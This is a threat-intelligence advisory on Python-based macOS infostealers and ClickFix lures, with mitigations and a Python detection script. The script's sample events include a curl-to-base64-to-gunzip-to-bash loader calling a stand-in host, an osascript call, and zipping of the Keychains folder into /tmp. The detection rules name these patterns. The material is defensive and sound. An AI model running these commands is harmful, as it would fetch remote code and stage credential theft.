Infostealers Without Borders: macOS, Python Stealers, and Platform Abuse
Summary:
In early February 2026, Microsoft Threat Intelligence released a comprehensive analysis of the evolving threat landscape for macOS systems, specifically focusing on the rise of Python-based infostealers. The research highlights a shift in adversary tactics where attackers are increasingly moving beyond traditional Windows-centric malware to target the growing enterprise footprint of macOS. These "borderless" infostealers, including variants like Atomic Stealer (AMOS), Poseidon, and Cthulhu, leverage Python's cross-platform capabilities and native macOS utilities like osascript to harvest sensitive data. The primary goal of these campaigns is the exfiltration of browser credentials, cryptocurrency wallets, and session cookies, which are then used to bypass multi-factor authentication (MFA) or sold as "initial access" on dark web marketplaces.
Beyond the technical shift to Python, the research identifies a significant evolution in distribution methods that exploit the "trust economy" of modern software development. Threat actors are increasingly moving away from simple malicious downloads toward sophisticated "ClickFix" campaigns and SEO poisoning. By masquerading as legitimate installers for popular tools, such as PDF editors, video conferencing software, or even AI-related utilities, adversaries trick users into executing terminal commands that bypass native macOS protections. This strategy effectively weaponizes the user's own administrative privileges, allowing the malware to operate "filelessly" or via ad-hoc signed executables that blend into the legitimate background noise of a developer's workstation.
Security Officer Comments:
This research underscores a critical shift in the "Macs are safer" narrative. As macOS adoption continues to climb in developer, executive, and creative roles within our member organizations, threat actors are professionalizing their macOS toolsets to match. The use of Python is particularly concerning for the IT sector because Python is a standard tool for many legitimate administrative and development tasks, allowing malicious scripts to blend into normal system activity more easily.
The impact on organizations is twofold: first, a single compromised macOS endpoint can serve as a "golden ticket" into cloud environments through stolen session tokens, effectively neutralizing traditional MFA. Second, the abuse of trusted platforms like GitHub and legitimate-looking signed applications to distribute these stealers means that even security-conscious users are at risk. For organizations supporting hybrid or remote workforces, these stealers represent a direct threat to the integrity of SaaS-based supply chains and internal corporate repositories.
Suggested Corrections:
Organizations can follow these recommendations to mitigate this threat:
Strengthen user awareness & execution safeguards
- Educate users on social‑engineering lures, including malvertising redirect chains, fake installers, and ClickFix‑style copy‑paste prompts common across macOS stealer campaigns such as DigitStealer, MacSync, and AMOS.
- Discourage installation of unsigned DMGs or unofficial “terminal‑fix” utilities; reinforce safe‑download practices for consumer and enterprise macOS systems.
Harden macOS environments against native tool abuse
- Monitor for suspicious Terminal activity—especially execution flows involving curl, Base64 decoding, gunzip, osascript, or JXA invocation, which appear across all three macOS stealers.
- Detect patterns of fileless execution, such as in‑memory pipelines using curl | base64 -d | gunzip, or AppleScript‑driven system discovery and credential harvesting.
- Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.
Control outbound traffic & staging behavior
- Inspect network egress for POST requests to newly registered or suspicious domains—a key indicator for DigitStealer, MacSync, AMOS, and Python‑based stealer campaigns.
- Detect transient creation of ZIP archives under /tmp or similar ephemeral directories, followed by outbound exfiltration attempts.
- Block direct access to known C2 infrastructure where possible, informed by your organization’s threat‑intelligence sources.
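As an added illustration of the detection guidance above (not code from Microsoft's report or from any product), the following Python script runs three behavioral checks over constructed process-execution records: the curl | base64 -d | gunzip in-memory pipeline, osascript or JXA invocation from a shell, and archive creation under an ephemeral directory as the staging step before exfiltration. The record format, field names, hostnames and sample commands are assumptions made for this example.

```python
import re
# Constructed sample process-execution records (not real telemetry): "<ts> user=<u> parent=<p> cmd=<command line>"
SAMPLE_EVENTS = [
    "2026-02-03T10:01:05Z user=dev parent=Terminal cmd=curl -s http://stager.invalid/p | base64 -d | gunzip | bash",
    "2026-02-03T10:01:09Z user=dev parent=bash cmd=osascript -e 'system info'",
    "2026-02-03T10:01:12Z user=dev parent=python3 cmd=zip -r /tmp/out.zip /Users/dev/Library/Keychains",
    "2026-02-03T10:05:00Z user=dev parent=Terminal cmd=curl -sSL https://example.invalid/app.tgz -o app.tgz",
    "2026-02-03T10:06:00Z user=dev parent=Terminal cmd=git pull",
]
EVENT_RE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
TMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "$TMPDIR")  # macOS ephemeral locations

def parse_event(line):
    """Parse one record into a dict, or None if the line is malformed."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None

def is_fileless_pipeline(cmd):
    """curl output piped into a base64 decode and then gunzip, in that order (in-memory loader)."""
    pos = {}
    for i, toks in enumerate(s.split() for s in cmd.split("|")):
        head = toks[0] if toks else ""
        if head == "curl":
            pos.setdefault("curl", i)
        elif head == "base64" and any(t in ("-d", "-D", "--decode") for t in toks[1:]):
            pos.setdefault("base64", i)
        elif head == "gunzip":
            pos.setdefault("gunzip", i)
    return len(pos) == 3 and pos["curl"] < pos["base64"] < pos["gunzip"]

def is_osascript_invocation(cmd):
    """AppleScript run through osascript, or JXA selected with -l JavaScript."""
    toks = cmd.split()
    return bool(toks) and (toks[0] == "osascript" or "-l JavaScript" in cmd)

def is_tmp_archive_staging(cmd):
    """An archive tool writing into an ephemeral directory, the staging step before exfiltration."""
    toks = cmd.split()
    if not toks or toks[0] not in ("zip", "tar", "ditto"):
        return False
    return any(t.startswith(TMP_DIRS) and t.endswith((".zip", ".tar", ".tgz", ".tar.gz")) for t in toks[1:])

RULES = (is_fileless_pipeline, is_osascript_invocation, is_tmp_archive_staging)
def scan(lines):
    """Return (timestamp, rule name, command line) for every record that matches a rule."""
    hits = []
    for ev in filter(None, map(parse_event, lines)):
        hits.extend((ev["ts"], rule.__name__, ev["cmd"]) for rule in RULES if rule(ev["cmd"]))
    return hits
```

Calling scan(SAMPLE_EVENTS) flags the first three records and nothing for the plain curl download or git pull, which is the kind of signal-to-noise a custom detection rule should aim for on a developer workstation.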
Protect against Python-based stealers & cross-platform payloads
- Harden endpoint defenses around LOLBIN abuse, such as certutil.exe decoding malicious payloads.
- Evaluate activity involving AutoIt and process hollowing, common in platform‑abuse campaigns.
Microsoft also recommends the following mitigations to reduce the impact of this threat:
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats.
- Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Allow investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to prevent attackers from using local administrator privileges to set antivirus exclusions.
https://www.microsoft.com/en-us/sec...ers-macos-python-stealers-and-platform-abuse/